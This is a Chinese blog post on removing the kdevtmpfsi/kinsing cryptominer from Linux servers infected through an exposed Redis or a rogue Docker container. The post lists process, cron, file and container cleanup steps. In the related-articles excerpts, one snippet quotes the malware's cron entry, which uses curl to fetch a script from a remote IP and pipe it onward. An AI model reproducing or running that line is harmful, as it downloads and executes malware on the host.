Linux CPU占用率99%很高被kdevtmpfsi 和kinsing 挖矿病毒入侵

最新推荐文章于 2024-06-28 17:35:00 发布
最新推荐文章于 2024-06-28 17:35:00 发布
阅读量3.6k 收藏 8
点赞数 3
分类专栏: linux 文章标签: linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdrfengmi/article/details/104461084
版权

目录

一.redis引起kdevtmpfsi

1:警告

2:查看cup占用

3:解决问题

1.首先停掉kdevtmpfsi的程序

2.删除Linux下的异常定时任务

3.结束kdevtmpfsi进程及端口占用

4:删除掉kdevtmpfsi的相关文件

4:怎么预防处理这个病毒

二.docker 引起kdevtmpfsi

1:查看病毒原

2:查找问题源头   

    2.1 查询定时任务

  2.2 查询相关文件,发现和docker有关,好的吧,接着去查看docker

3:解决问题

一.redis引起kdevtmpfsi

1:警告


先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。使用netstat -antp命令查看端口使用情况,又出现了kdevtmpfsi如图三所示

2:查看cup占用

[root@server02 tmp]# top

3:解决问题

一般出现kdevtmpfsi病毒都会伴有定时任务,就会出现我上面说的处理一次后,又会继续出现,反反复复处理不干净。

1.首先停掉kdevtmpfsi的程序

[root@server02 apache-hive-2.1.1-bin]# ps -aux

找到kdevtmpfsi的进程

删除掉与kdevtmpfsi相关的进程

kill -9 6316
kill -9 6402

2.删除Linux下的异常定时任务

 

  • crontab -l 查看定时任务
  • crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除

如下图所示

3.结束kdevtmpfsi进程及端口占用


netstat -antp
1找到kdevtmpfsi端口。不要直接杀掉,因为有守护线程还会重启。

杀死进程

[root@server02 apache-hive-2.1.1-bin]# ps -aux | grep kinsing
[root@server02 apache-hive-2.1.1-bin]# ps -aux | grep kdevtmpfsi

kill -9 14511
kill -9 14493

4:删除掉kdevtmpfsi的相关文件

cd  /tmp
ls
rm -rf kdevtmpfsi 
rm -rf /var/tmp/kinsing  
最后自己可以再检查一下是否还有kdevtmpfsi的相关文件,有的话就继续删除
find / -name kdevtmpfsi
find / -name kinsing

4:怎么预防处理这个病毒


最根本的原因是自己的redis 6379配置不当导致的。大家可以参考阿里云的Redis服务安全加固

 

二.docker 引起kdevtmpfsi

1:查看病毒原

2:查找问题源头   

 
   2.1 查询定时任务

crontab -l

   查询定时任务。并没有发现,可能隐藏在别的地方

  2.2 查询相关文件,发现和docker有关,好的吧,接着去查看docker

find / -name kdevtmpfsi

查看执行的docker

docker ps

 ubuntu是什么,我从来没装过,看来有可能潜伏在里面

3:解决问题

docker stop 88ec131c4c4e --停止容器
docker ps -a             --查询容器的id
docker rm 88ec131c4c4e   --删除容器
docker images            --查询镜像
docker rmi 4e5021d210f6  --删除镜像(如果前面命令删除不了,可以用这个docker rmi -f image_ID )

 

bigDataShare
关注
专栏目录
linux 中毒 挖矿病毒,占用大量cpu,杀毒过程
lg4546的专栏
07-19 692
linux 挖矿病毒 , cpu 占用比较大 lVlgd 进程 , crontab 定时执行
GPU 资源占用率30%感觉有点怀疑中了挖矿病毒,结果
weixin_43480227的博客
05-06 8025
GPU 资源占用率30%感觉有点怀疑中了挖矿病毒,结果 使用nvidia-smi 查看结果如上图。 GPU资源占用率GUP-Util 30%~左右,GPU memory Usage 81MiB. 是不是 问题排查: 1.中了挖矿程序病毒?参考这个看了下,没发现实际线索。 https://www.west.cn/docs/69966.html 2. /usr/lib/xorg/Xorg是个啥? 排查下。 偶然看到这个类似bug描述,怀疑与外置HDMI显示器有关 https://askubuntu.co.
kdevtmpfsi & kinsing 挖矿病毒
chizhou52501314的博客
03-03 1439
一直寄希望于暂时不会被攻击,事实证明互联网不会让你失望,网络险恶,“裸奔”慎重,只要你裸着,肯定会有人发现你,保护好自己最重要
linux cpu内存99,服务器内存占用长期99%
weixin_42503036的博客
04-30 1730
如果Linux系统的ECS实例CPU持续保持使用率,则会对系统稳定性和业务运行造成影响。可以按如下步骤进行处理。定位问题。找到影响CPU使用率过的具体进程。 分析处理。查看影响CPU使用率过的进程是否正常,并分类进行处理。对于正常进程:您需要对程序进行优化或者升级服务器配置。 对于异常进程:您可以手动对进程进行查杀,也可以使用第三方安全工具去查杀。CPU负载的查询分析 在Linux系统中,查...
Linux服务器被work32病毒入侵CPU占用99%
最新发布
风高秋月白,雨霁晚霞红
06-28 1580
work32病毒
linux cpu占用100%排查
热门推荐
qinshi501的博客
08-21 4万+
服务器上部署了若干tomcat实例,即若干垂直切分的Java站点服务,以及若干Java微服务,突然收到运维的CPU异常告警。 问:如何定位是哪个服务进程导致CPU过载,哪个线程导致CPU过载,哪段代码导致CPU过载? 步骤一、找到最耗CPU的进程 工具:top 方法: 执行top -c ,显示进程运行信息列表 键入P (大写p),进程按照CPU使用率排序 图示:
linux mysql cpu99%_mysqlCPU占用99.9%问题解决:
weixin_42501881的博客
01-27 283
分析:用ulimit -a|grep open 命令查看了结果为:open files 1024用cat /proc/sys/fs/file-max查看结果为:379816结论:和操作系统默认允许的最大句柄数有关.需增大.解决:1。修改 /etc/rc.local 添加echo 8061540 > /proc/sys/fs/file-max2。直...
linux cpu内存99,linux下查看cpu、内存和硬盘大小
weixin_39586915的博客
04-30 109
cpu#dmesg |grep -ixeonCPU0: Intel(R) Xeon(R)CPUE5520 @ 2.27GHz stepping 05CPU1: Intel(R) Xeon(R)CPUE5520 @ 2.27GHz stepping 05CPU2: Intel(R) Xeon(R)CPUE5520 @ 2.27GHz...
linux io 99.9%先用,2018年第九周-解决因jbd2导致Linux性能过低问题
weixin_33795542的博客
05-14 385
问题在很多MySQL实践中,或者压测中,特别是从centos官方下载DVD直接安装的linux,可能会遇到这样一个问题,为什么有些机子硬件性能很好的,数据库入库的速度比那些不好的机子还快。从MySQL Workbench的工具能够看出实时的入库记录数,可能才20~200多条,这速度太慢了。于是怀疑是不是数据库配置问题,等把InnoDB缓存等MySQL配置一模一样之后,这样的问题还是存在。于是就用t...
病毒】【CPU使用率为100%】Linuxkdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1171
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式
weixin_42165712的博客
03-11 623
中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常。处理方法:1. 查看占用的进程。# top2. 排序按下1,找到占用CPU的进程后,Ctrl+z退出。3. 查找对应的进程号。(可以使用pgrep来更加精确查询)# ps -aux | grep kdevtmpfsi# ps -aux | grep kinsing4. 杀掉该进程。# kill -9 12739...
linux病毒感染 CPU使用很
qq_40914968的博客
04-18 1383
被当矿机。。挖矿 这个机器运行着k8s master 跑着几十个应用和DB 不能重装 crontab -e 查到 dd掉这段 删除 后续处理: 删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | ...
linux下“kdevtmpfsi“与“kinsing“进程导致系统卡顿
全栈开发者的博客
11-23 1307
系统卡顿,top下发下cpu异常 kdevtmpfsi是一种挖矿病毒,而且有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 1.杀掉进程并删除文件(杀掉之后还会重新启动) ps -aux | grep kinsing kill -9 15881 ps -aux | grep kdevtmpfsi kill -9 15881 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kins.
解决挖矿病毒占用cpu(sysupdate、networkservice)
周大侠的博客
04-01 5212
我也是有一段时间服务器变的很卡,那时我还以为是我自己的软件装太多导致的问题,不看不知道,看了吓一跳,服务器已经被攻击了,接下来,我来分享下如何查找和解决这个病毒。 一、找出病毒 当发现服务器卡的时候,我们可以采用top命令,如下显示 image.png 我们注意看以上这几个进程,没稍加注意的话,我们还以为这几个是正常的进程,为啥呢? 1、毕竟这几个的user是apache、ww...
Linux 病毒kdevtmpfsi挖矿的解决办法(三),因为又出现挖矿病毒文件了,所以需要继续查找源头
80后大叔爱学习
02-01 943
grep -r "newdat.sh" /*
Linux服务器CPU100%问题(云服务器中了挖矿病毒
小小本科生
07-24 2875
今天玩云服务器,发现服务器变得很卡顿,解压文件有时都卡死了,很奇怪,不知道服务器出了什么状况。 于是登录到阿里云查看云服务器的情况,结果发现服务器CPU使用率一直维持在100%。 于是远程连接到服务器,进行问题排查 1、查消耗cpu的进程PID,输入top命令 2、根据PID查出消耗cpu的线程号。top -Hp 512,显示一个进程的线程运行信息列表。 3、把上面线程的十进制数转成十六进制(printf %x 1062) 为426 4、根据线程号查出对应的java线程,进行处理。jstac
linux服务器CPU中毒排查
HouYing
11-30 1582
通过top查看到了,占用CPU进程,记录下进程号 cd/proc/进程号 ls -la 查看到exe后边对应的命令为:usr/bin/-bash (deleted) 在每小时的脚本中找到了sync,然后通过这个找到了病毒所在目录:/bin/sysdrr 病毒清理脚本如下: chattr -R -i /bin/sysdrr chattr -R -i /etc/cron.d/0hourly chattr -R -i /etc/cron.daily/sync chattr -R -i /.
记一次杀毒工作--kdevtmpfsi挖矿病毒
Nickkun的博客
12-28 679
起因:redis配置不安全导致 参考文章: https://help.aliyun.com/knowledge_detail/37447.html?spm=a2c4g.11186631.2.2.828c1848kuRv6p 1.漏洞描述 Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用。 在特定条件下,如果 Redis 以 root 身份运行,黑客可以给 root 账号写入 SSH 公钥文件,直接通过 SSH 登录受害服务器,从而获取服务器权限和数据。一旦入侵成功,攻击者可直接添加账号用于 S
挖矿kdevtmpfsi病毒处理
感冒石头的博客
05-14 1025
通过top命令可以看到kdevtmpfsi导致CPU 700%多,导致该病毒只要是通过redis漏洞进来的。1、该病毒还有守护进程,如果光kill掉该病毒,过段时间又起来的。守护进程:kinsing 2、该病毒还有定时任务、如果光杀死kdevtmpfsikinsing没有用,定时任务会再度重启这两个进程。解决办法:1、设置redis只对当前服务器或者指定服务器放开。取消掉 bind 0.0.0.0 设置 bind 127.0.0.1 或者加其他ip ,2、crontab -l ----》可以在...
linux cpu占用率100%怎么解决
06-28
### 回答1: 如果Linux CPU占用率达到了100%,需要先找出导致这个问题的程序,并尝试结束它。可以使用top命令来查看系统占用率的进程并结束它,或者使用htop这样的工具来查看更详细的系统性能。如果问题仍然存在,可以尝试升级内核或增加硬件资源来解决。也可以优化系统配置或者代码,减少CPU占用率。 ### 回答2: 如果你的计算机上安装了Linux操作系统,并且在使用过程中出现了CPU占用率100%的情况,那么需要根据具体情况采取不同的解决方法。以下是几种可能的解决方法: 1. 关闭无用的进程和服务:在Linux系统中,运行的进程和服务都会占用CPU资源,如果不需要或者用不到的进程和服务,可以关闭它们,从而减轻CPU的负担。可以通过ps命令查看运行的进程,然后使用kill命令关闭不需要的进程,或者通过systemctl命令关闭不需要的服务。 2. 优化应用程序:如果CPU占用率100%是由于某个应用程序造成的,可以尝试进行优化,比如使用更优化的代码,减少不必要的计算等等,从而减轻CPU的负担。 3. 检查硬件设备:口亨有时候CPU占用率100%也可能是由硬件设备故障引起的,比如硬盘读写错误、内存损坏等等。可以使用诸如smartctl、memtest86等工具进行检查和修复,以确保硬件设备的正常运作。 4. 调整系统设置:有时候CPU占用率100%也可能是由于系统设置不恰当造成的,比如过度使用swap分区、调度算法设置不当等等。可以通过修改sysctl.conf、/etc/security/limits.conf等文件来进行调整,或者使用tuned、systemd-sysctl等工具进行优化。 总之,有效地降低Linux CPU占用率100%需要先查找出造成问题的原因,然后针对具体问题采取相应的措施,以实现有效的解决方案。在这个过程中,需要掌握一定的技巧和知识,避免盲目操作造成更大的问题。如果自己无法解决,可以寻求专业人士的帮助。 ### 回答3: Linux系统中,CPU占用率100%通常是由于进程或者服务的异常状态,导致其无法正常工作,从而占用了大量的CPU资源。因此,我们需要从以下几个方面来解决这个问题。 1. 查看进程占用情况:我们可以通过top或者htop命令来查看当前进程的占用情况。在top或htop命令中,我们可以按P键来按照CPU占用率进行排序,找到占用CPU资源较大的进程。可以看看进程是否异常,如果异常可以尝试结束进程,或者重启服务。 2. 查看系统负载:我们还可以通过uptime命令或者sar命令来查看系统负载情况。如果系统负载较,说明系统资源已经被耗尽,这时可以考虑对系统进行升级或者优化,或者增加系统资源。 3. 查看系统日志:有时候,系统日志中也会记录一些重要信息,可能会有一些异常的日志信息,导致CPU占用率。因此,我们可以使用命令tail -f /var/log/messages 来实时查看系统日志。 4. 使用系统监控工具:Linux系统中有很多监控工具,如Nagios、Zabbix等,可以对系统进行实时监控,这些监控工具可以对CPU占用率、内存使用率、硬盘使用率等进行统计分析,让我们及时了解到系统运行情况,从而及时发现和解决问题。 综上所述,如果Linux CPU占用率100%,我们需要通过查看进程占用情况、系统负载、系统日志以及使用系统监控工具来进行排查和解决,让系统恢复正常。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值